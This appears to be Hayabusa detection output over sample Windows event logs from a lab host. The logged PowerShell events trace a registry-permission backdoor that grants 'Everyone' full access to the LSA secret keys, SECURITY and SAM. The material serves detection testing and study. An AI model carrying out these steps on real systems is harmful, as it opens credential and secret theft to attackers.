19:54:03.453 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Backdooring completed for key""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.453 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : 
SYSTEM\CurrentControlSet\Control\Lsa\JD] Backdooring started for key""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.453 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\JD] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.453 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Ace""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.468 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\JD] Creating the trustee WMI object with user 'Everyone'""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify 
registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.468 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Trustee""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.468 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\JD] Applying Trustee to new Ace""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.468 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\JD] Calling SetSecurityDescriptor on the key with the newly created Ace""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.486 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; 
value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\JD] Backdooring completed for key""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.486 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Backdooring started for key""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.494 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.494 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Ace""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify 
registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.494 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Creating the trustee WMI object with user 'Everyone'""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.494 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Trustee""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.503 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Applying Trustee to new Ace""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.503 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : 
SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Calling SetSecurityDescriptor on the key with the newly created Ace""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.503 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Backdooring completed for key""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.503 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Data] Backdooring started for key""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.519 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Data] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 
Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.519 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Ace""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.519 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Data] Creating the trustee WMI object with user 'Everyone'""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.519 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Trustee""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.535 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): 
name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Data] Applying Trustee to new Ace""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.540 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Data] Calling SetSecurityDescriptor on the key with the newly created Ace""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.540 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Data] Backdooring completed for key""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.540 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Backdooring started for key""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify 
registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.556 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.556 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Ace""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.556 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Creating the trustee WMI object with user 'Everyone'""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.556 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" 
ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Trustee""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.556 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Applying Trustee to new Ace""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.571 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Calling SetSecurityDescriptor on the key with the newly created Ace""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.571 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Backdooring completed for 
key""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.571 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SECURITY] Backdooring started for key""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.571 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SECURITY] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.571 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Ace""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.587 
+00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SECURITY] Creating the trustee WMI object with user 'Everyone'""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.587 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Trustee""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.587 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SECURITY] Applying Trustee to new Ace""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.603 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SECURITY] Calling SetSecurityDescriptor on the key with the newly created 
Ace""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.627 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SECURITY] Backdooring completed for key""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.627 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SAM\SAM\Domains\Account] Backdooring started for key""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.634 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SAM\SAM\Domains\Account] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.634 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline 
Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Ace""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.634 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SAM\SAM\Domains\Account] Creating the trustee WMI object with user 'Everyone'""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.634 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Trustee""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.650 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SAM\SAM\Domains\Account] Applying Trustee to new 
Ace""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.650 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SAM\SAM\Domains\Account] Calling SetSecurityDescriptor on the key with the newly created Ace""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.650 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SAM\SAM\Domains\Account] Backdooring completed for key""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.650 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03] Backdooring completed for system""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.666 +00:00,fs03vuln.offsec.lan,4104,info,,PwSh Scriptblock 
Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.666 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""PSObject""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.666 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Add-Member): ""Add-Member"" ParameterBinding(Add-Member): name=""MemberType""; value=""NoteProperty"" 